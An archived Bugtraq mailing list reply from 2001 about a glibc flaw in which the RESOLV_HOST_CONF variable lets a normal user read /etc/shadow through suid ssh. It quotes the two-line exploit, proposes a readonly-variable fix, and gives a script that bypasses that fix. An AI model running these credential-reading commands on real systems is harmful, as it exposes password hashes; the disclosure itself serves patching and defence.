Home page logo

bugtraq logo Bugtraq mailing list archives

Re: Glibc Local Root Exploit
From: Digital Overdrive <digiover () dsinet org>
Date: Wed, 10 Jan 2001 23:43:31 +0100

Charles Stevenson wrote:

Hi all,
  This has been bouncing around on vuln-dev and the debian-devel lists. It
effects glibc >= 2.1.9x and it would seem many if not all OSes using these
versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and
the actual fix was a missing comma in the list of secure env vars that were
supposed to be cleared when a program starts up suid/sgid (including
RESOLV_HOST_CONF)." The exploit varies from system to system but in our
devel version of Yellow Dog Linux I was able to print the /etc/shadow file
as a normal user in the following manner:

export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com

huge typo in my previous post...
services has to be profiles ;-)

[Credits to ^herman^ in #hit2000 on ircnet]
A temp. sollution is to place this in /etc/profiles:

jan () flits102-93:~$ export RESOLV_HOST_CONF=/etc/shadow
bash: RESOLV_HOST_CONF: readonly variable
jan () flits102-93:~$

But even here is a workaround for :
Make a script (e.g. blaat)

export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com

~$ sh --noprofile blaat

[again credits to ^herman^]


Jan (Digital Overdrive)

 .~.   http://www.dsinet.org | http://www.dsinet.org/hackfaq
 /V\   digiover () dsinet org |  digiover () cotse com
/( )\

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]